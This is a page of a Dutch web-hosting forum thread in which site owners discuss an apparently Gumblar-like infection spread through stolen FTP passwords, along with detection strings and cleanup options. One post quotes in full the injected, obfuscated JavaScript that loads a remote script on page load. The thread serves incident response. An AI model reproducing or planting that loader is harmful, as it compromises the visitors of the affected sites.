Likes Likes:  0
Resultaten 16 tot 30 van de 31
Pagina 2 van de 3 Eerste 1 2 3 LaatsteLaatste
Geen

Onderwerp: Gumblar virus?

  1. #16
    Gumblar virus?
    geregistreerd gebruiker
    6.041 Berichten
    Ingeschreven
    23/10/04

    Locatie
    Amersfoort

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    171 Berichten zijn liked


    Functie: Freelance IT Professional
    URL: localhost
    View randytenhave's profile on LinkedIn

    NIet echt een oplossing, maar je kunt met mod_security wel voorkomen dat de boel door Apache weer uitgespuugd wordt. ASL biedt voor $80.- per jaar een goede dienst: http://www.atomicorp.com/. Zelf je regels maken en bijwerken is te kostbaar met tijd.
    MultiMaak - Voor persoonlijke cadeau's en relatiegeschenken!

  2. #17
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Randy leg eens uit, wat kan mod_security daar aan tegenhouden?
    Het account had ergens software gedownload met een virus erin, vervolgens zijn de passwords gestolen en zo aan de logs te zien is er door verschillende ip's ingelogd.
    Het is volgens mij niet het Gumblar virus, deze heeft 1 regel onderaan toegevoegd.
    Of het moet een nieuwe variant zijn van dat virus, dat weten we pas over een paar dagen als er meer accounts de dupe zijn geworden.
    Het verspreid zich niet, het betreft alleen de accounts van een reseller omdat hij alle wachtwoorden opgeslagen had in total commander.
    Maar als zo'n string erin is gezet (met een script?) dan moet hij er toch ook eruit te halen zijn met een script?

  3. #18
    Gumblar virus?
    geregistreerd gebruiker
    2.483 Berichten
    Ingeschreven
    03/09/08

    Locatie
    Maasbracht

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    32 Berichten zijn liked


    Bedrijf: Piwi-Web
    Functie: Eigenaar
    URL: www.piwi-web.com
    KvK nummer: 14097251

    Citaat Oorspronkelijk geplaatst door Herbert Bekijk Berichten
    Maar als zo'n string erin is gezet (met een script?) dan moet hij er toch ook eruit te halen zijn met een script?
    Niet altijd, als het script random steeds wordt aangepast dan is het niet met een script te verwijderen zo denk ik...
    Je kan natuurlijk wel checken op code's die wel hetzelfde zijn =)
    Piwi-Web IT Solutions - Website - E-mail

  4. #19
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Citaat Oorspronkelijk geplaatst door Piwi-Web Bekijk Berichten
    Niet altijd, als het script random steeds wordt aangepast dan is het niet met een script te verwijderen zo denk ik...
    Je kan natuurlijk wel checken op code's die wel hetzelfde zijn =)
    Deze zijn allemaal hetzelfde, gumblar zet volgens mij de code in /images/image.php met een base64 string.
    Volgens mij is het een nieuw type virus die schrijft in ind*.htm ind*.php en *.js

  5. #20
    Gumblar virus?
    geregistreerd gebruiker
    6.041 Berichten
    Ingeschreven
    23/10/04

    Locatie
    Amersfoort

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    171 Berichten zijn liked


    Functie: Freelance IT Professional
    URL: localhost
    View randytenhave's profile on LinkedIn

    Citaat Oorspronkelijk geplaatst door Herbert Bekijk Berichten
    Randy leg eens uit, wat kan mod_security daar aan tegenhouden?
    Deze module filtert de in- en output van Apache (PHP) met dergeels die je hebt. Je kunt dus opbasis van reg_exps dergelijke iframes en bepaalde URL's detecteren en automatisch laten verwijderen. Het is alleen een hell om die regels zelf bij te houden. Zeker voor die 6 tientjes per server per jaar.

    Berrie heeft ervolgens mij ook goede ervaringen mee. Ik gebruik het enkel op twee shared servers die ik in beheer heb met budgetklanten ("Een bepaalde doelgroep, die weer een bepaalde aantrekkingskracht heeft... )
    MultiMaak - Voor persoonlijke cadeau's en relatiegeschenken!

  6. #21
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Ik ben alweer wat verder..
    Het is een nieuwe hack die vanaf 29-11-2009 actief is, tot nu toe doet die weinig.
    De code wordt onderaan in de index*.* en *.js geplaatst, dus ook onder de </BODY></HTML>
    Er wordt overal dezelfde string gebruikt en er zijn geen varianten bekend tot nu toe.
    Nu is het alleen nog wachten op de variant, de makers zullen ook wel zien dat deze zo goed als niets geen effect heeft.
    Inmiddels kun je op google resultaten vinden als je zoekt op deze string "H3qqea3ur6p"

  7. #22
    Gumblar virus?
    geregistreerd gebruiker
    222 Berichten
    Ingeschreven
    26/03/08

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    Registrar SIDN: JA
    ISPConnect: Lid
    KvK nummer: 53693574
    Ondernemingsnummer: nvt

    Hoi,

    Je kan je inkomende FTP verkeer laten scannen door bijvoorbeeld clamv of een andere virusscanner.
    Hier zijn op internet ook kant en klare scripts voor te vinden, weliswaar tegen betaling.

    Echter, nadeel is natuurlijk wel dat dit voor een hogere i/o belasting zorgt op je server en het is nog maar de vraag of je virusscanner op de server up2date is, gezien het feit dat het gublar virus elke keer weer andere strings gebruikt.

    Of je zou moeten aangeven dat er geen Iframe,s mogen worden geupload, echter kwam ik een paar dagen geleden een gublar virus tegen welke geen gebruik maakte van Iframe maar iets anders. (ben het ff kwijt)


    P.S: is er inmiddels al een werkend tooltje om dit virus van je PC te verwijderen?

  8. #23
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Even voor de duidelijkheid het is geen iframe zoals gumblar.
    Clamav staat aan op de ftp en die ziet hem niet, trouwens geen enkele scanner ziet hem nog omdat het een nieuw virus is.
    Het stukje code wat helemaal onderaan in de pagina als laatste regel wordt gezet dat is alles en meer niet.
    Leuk is het niet, AVG of Mallwarebytes ziet hem ook nog niet.

  9. #24
    Gumblar virus?
    geregistreerd gebruiker
    6.041 Berichten
    Ingeschreven
    23/10/04

    Locatie
    Amersfoort

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    171 Berichten zijn liked


    Functie: Freelance IT Professional
    URL: localhost
    View randytenhave's profile on LinkedIn

    ClamAV ziet toch al vrijwel niets als je de standaard updates gebruikt. Er zijn wel wat goede optionele repositorys te vinden die een stuk actueler zijn.
    MultiMaak - Voor persoonlijke cadeau's en relatiegeschenken!

  10. #25
    Gumblar virus?
    geregistreerd gebruiker
    2 Berichten
    Ingeschreven
    17/11/08

    Locatie
    Aalst

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Zelfde probleem hier gehad. De ftp-wachtwoorden worden gestolen via een Trojan met de naam Daurso.A. De payload was dus op verschillende sites terug te vinden en dit niet alleen in de index*.html/js/php bestanden maar ook in alles dat met 'main' begint.

  11. #26
    Gumblar virus?
    geregistreerd gebruiker
    222 Berichten
    Ingeschreven
    26/03/08

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    Registrar SIDN: JA
    ISPConnect: Lid
    KvK nummer: 53693574
    Ondernemingsnummer: nvt

    Even een klein Gublar of ander virus updateje,

    Vandaag werd een site van onze klant geinfecteerd, niet met het virus maar met een iframe redirect naar een parking site (reclame dus)
    Ik vermoed dat dit dus wel met elkaar te maken heeft en nu dus niet zo zeer meer het virus wordt verspreid maar nu ook de pagina,s worden geredirect naar bijvoorbeeld: http://hosttracker.net.

    Ik heb zojuist sedo ook een abuse mail hierover verstuurd.

  12. #27
    Gumblar virus?
    Certified
    3.404 Berichten
    Ingeschreven
    06/11/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    54 Berichten zijn liked


    KvK nummer: 02099933

    Ik kwam nog een pagina tegen waar de werking van het Gumblar virus duidelijk staat uitgelegd; http://www.viruslist.com/en/weblog?weblogid=208187897

    Edit: En een handleiding hoe je het virus van je website automatisch verwijderd;
    http://www.danielansari.com/wordpres...martuz-trojan/
    &
    http://blog.unmaskparasites.com/2009...1/#comment-896

  13. #28
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Bij de melding van mij was er niets te vinden op google, 2 dagen later 3 pagina's op google..
    Inmiddels al meer dan 10 pagina's aan informatie als je zoekt op deze string "H3qqea3ur6p"
    Ik denk dat er over een week honderden pagina's op google staan hierover.

  14. #29
    Gumblar virus?
    geregistreerd gebruiker
    1 Berichten
    Ingeschreven
    09/12/09

    Locatie
    Utrecht

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Ik heb precies dit probleem. Mijn site is geïnfecteerd en ik probeer het nu al dagen te fixen. Steeds blijft de volgende regel code onderaan mijn pagina staan. Ergens wordt dit nog gegenereerd maar ik weet niet waarvandaan.
    Tot nu toe alle index bestanden en .js bestanden bevatten deze code:

    <script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAt tribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@ .&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r# $#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c !&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>


    Weet iemand ondertussen meer?

    Ik heb deze code ondertussen verwijderd uit de genoemde bestanden, maar het heeft geen effect gehad. Ik draai de meest up to date versie van Joomla.

  15. #30
    Gumblar virus?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Thread Starter
    Citaat Oorspronkelijk geplaatst door cappelmans Bekijk Berichten
    Weet iemand ondertussen meer?

    Ik heb deze code ondertussen verwijderd uit de genoemde bestanden, maar het heeft geen effect gehad. Ik draai de meest up to date versie van Joomla.
    Heb je het wachtwoord van de FTP ook veranderd?
    Zo niet dan het wachtwoord ook veranderen voor je FTP client.
    Inmiddels duiken er varianten op van dit type "virus" mallware of hoe je het wil noemen met dit woord in de string: Jqjzlgspz98uxl
    Mijn mening is dat dit niets met Gumblar te maken heeft, het is een nieuwe "hack"

Pagina 2 van de 3 Eerste 1 2 3 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics